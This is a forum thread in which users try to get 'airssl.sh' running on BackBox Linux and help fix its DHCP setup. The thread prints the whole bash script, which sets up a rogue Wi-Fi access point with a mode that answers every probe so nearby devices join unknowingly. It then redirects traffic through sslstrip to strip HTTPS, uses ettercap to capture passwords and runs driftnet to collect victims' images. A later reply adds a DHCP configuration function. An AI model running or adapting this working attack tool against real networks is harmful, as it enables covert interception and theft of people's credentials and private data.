Author Topic: Can anyone get this script to work properly on Backbox? airssl.sh  (Read 6036 times)

n1tr0g3n_0x1d3 (Newbie, Posts: 48)
This is a Fake AP creator which runs sslstrip; it would be nice to see it 100% running on Backbox. It's almost working as is, though.


Here's the link to the script: http://hitman-pt.zzl.org/downloads/airssl.sh

And here is a post about the script itself and how to configure it: http://hitmanpt.wordpress.com/2011/01/29/backtrack-fake-wifi-ap/

It was made for crapTrack but should be easily fixed to run on Backbox, I'm pretty sure, if you are good at bash scripting. Any help would be appreciated. Thanks guys.


I tried to get it working but no luck... Thanks again for your help.



ostendali (Global Moderator, Hero Member, Posts: 587)
This script is customized for BT...
It is a very simple script and can be easily adapted to Backbox, but who are the owners?
Do you know them? Because we can't manipulate it by adapting it to our system without their consent, since no license has been declared on it.....
When no license is declared the app is automatically proprietary....
Where did you get this script, if I may ask?



n1tr0g3n_0x1d3 (Newbie, Posts: 48)
This guy seems to be the originator of the script, killadaninja, over on the BT forums, but it would be safe to say we couldn't ask about anything with the word Backbox in it over at the BT forums because the admins might have a small heart attack and need to be rushed to the nearest emergency room LOL ;D, much less would the message ever make it to him because of moderation hating lol. Would be awesome to see it running on Bbox though. Hope we can figure something out :) Thanks for the quick reply ostendali.
« Last Edit: March 23, 2012, 11:35:05 AM by n1tr0g3n_0x1d3 »



ostendali (Global Moderator, Hero Member, Posts: 587)
Actually it is not a big deal to re-write a script like that.....
But I don't want to give the idea that it is copied from this one...
So, will think about it and see what we can do regardless...



weVeg (Hero Member, Posts: 737)
This is a Fake AP creator which runs sslstrip; it would be nice to see it 100% running on Backbox. It's almost working as is, though.


Here's the link to the script: http://hitman-pt.zzl.org/downloads/airssl.sh

And here is a post about the script itself and how to configure it: http://hitmanpt.wordpress.com/2011/01/29/backtrack-fake-wifi-ap/

It was made for crapTrack but should be easily fixed to run on Backbox, I'm pretty sure, if you are good at bash scripting. Any help would be appreciated. Thanks guys.


I tried to get it working but no luck... Thanks again for your help.
If you want, I wrote something very similar... It has a small problem loading the dhcpd.conf and I don't know whether it's my problem or a bug, since online I found similar errors but with the most desperate solutions... If you want, you can be my "tester"; for the rest it works well enough...

Edit: actually no, I told you a load of rubbish. I read the whole script: mine prepares karma and the DHCP server and loads it into metasploit; half of it is the same, the last part differs, where it starts ettercap, which I don't need. But if you take half of this one and half of another script I posted for sniffing with sslstrip and arpspoof you get almost the same thing... Or if you want we rewrite one from scratch, since it's simple anyway!
« Last Edit: March 23, 2012, 01:29:55 PM by weVeg »

A free voice is always liberating
under_r00t


n1tr0g3n_0x1d3 (Newbie, Posts: 48)


Ok, I'm about 98% complete with the Airssl script working completely on Backbox. The only problem I am having is that I can't obtain an IP after connecting to the Fake AP. I put a lot of time into editing this script and it's been on my mind for a while to get it working on Backbox. I haven't had much help on it at all and no one seems to be willing to get this script converted for BB. I think it would be great to have a Fake AP generator that takes about 15 seconds to set up and which sniffs SSL logins and runs urlsnarf along with driftnet. I didn't create the script but I have dreams of one day having it working on Backbox. If anyone can point out the issue in the script that's giving me the headache it would be greatly appreciated.

I'm not looking for a handout since I've spent about 10 hours editing & researching creating Fake APs and all, to be able to understand the script and get it working. It wasn't easy to get it running this well, and it was missing a few lines right off the bat that stopped the script from creating the interface; plus it was written to use tap interface at0 and I changed it to use mon0 as the Alfa card uses. Hope the community can get this running with me as it would be an early Christmas gift and be an awesome script for the community to enjoy :) Just hoping someone sees that I have tried to get this script 100% but I'm stuck between lines #108 & #110 and think this is where the problem lies. Here's the edited script below for you to test out and see this has some huge potential.

I would think that the line option domain-name-servers 10.0.0.1; should be set to something like 8.8.8.8 or 4.2.2.2 as well.


https://www.onlinefilefolder.com/4sqxnjzcqZ7ZZi




#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/backbox/wireless_analysis/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /backbox/wireless_analysis/airssl/dhcpd.conf

# Fake ap setup
echo "[*] Configuring FakeAP...."

echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your chosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your chosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
 

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[*] Starting FakeAP..."

xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[*] Starting FakeAP..."

xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -v -e "$ESSID" -c 11 -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi


if [ $ANSWER = "n" ] ; then
echo
echo "[*] Starting FakeAP..."

xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[*] Configuring forwarding tables..."

ifconfig lo up
ifconfig mon0 up &
sleep 1
ifconfig mon0 10.0.0.1 netmask 255.255.255.0
ifconfig mon0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface mon0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[*] Setting up DHCP..."

touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/backbox/wireless_analysis/airssl/dhcpd.conf" mon0 & dchpid=$!
sleep 3

# Sslstrip
echo "[*] Starting sslstrip..."

xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "[*] Configuring ettercap..."

echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set, you CANNOT use "\"interface type\"" switches here.
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redefined here.
Ettercap's output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[*] Starting ettercap..."

xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i mon0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[*] Starting ettercap..."

xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i mon0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[*] Driftnet?"

echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[*] Starting driftnet..."

driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[*] Activated..."

echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercap's xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftnetdata "
echo
echo "[*] IMPORTANT..."

echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[*] Cleaning up airssl and resetting iptables..."


kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[*] Clean up successful..."

echo "[*] Thank you for using airssl, Good Bye..."

exit

fi
exit



« Last Edit: August 15, 2012, 08:27:31 PM by n1tr0g3n_0x1d3 »



weVeg (Hero Member, Posts: 737)
look: http://pastebin.com/jbeALQDf

This is the function that I use to configure the DHCP server. I worked hard because the config file must be saved in /etc/dhcp/, so change the folder!!! And write it line by line!

dh_conf="/etc/dhcp/dhcpdevi.conf" ;

i_man="wlan0" ;
i_mon="mon0" ;
essid="TEST" ;
net="10.0.0.0" ;
net_mask="255.255.255.0" ;
ip_ap="10.0.0.1" ;

# Write the dhcpd config under /etc/dhcp/ one line at a time, only if it is not already there.
# Variables are quoted so a path with spaces cannot break the test or the redirects.
fun_dhcp () {
        if [ -e "$dh_conf" ]
                then
                        echo
                        echo "[ok] dh_conf presente"
                else
                        echo
                        echo "sto scrivendo il file di configurazione"
                        touch "$dh_conf"
                        echo "option domain-name-servers $ip_ap ;" >> "$dh_conf"
                        echo "default-lease-time 60;" >> "$dh_conf"
                        echo "max-lease-time 7200;" >> "$dh_conf"
                        echo "ddns-update-style none;" >> "$dh_conf"
                        echo "authoritative;" >> "$dh_conf"
                        echo "log-facility local7;" >> "$dh_conf"
                        echo "subnet $net netmask $net_mask {" >> "$dh_conf"
                        echo "range 10.0.0.50 10.0.0.254;" >> "$dh_conf"
                        echo "option routers $ip_ap ;" >> "$dh_conf"
                        echo "option domain-name-servers $ip_ap ;" >> "$dh_conf"
                        echo "}" >> "$dh_conf"
                        # dhcpd only needs to read the file; world-writable (777) is not required
                        sudo chmod 644 "$dh_conf"
        fi
        }
« Last Edit: August 15, 2012, 10:03:41 PM by weVeg »
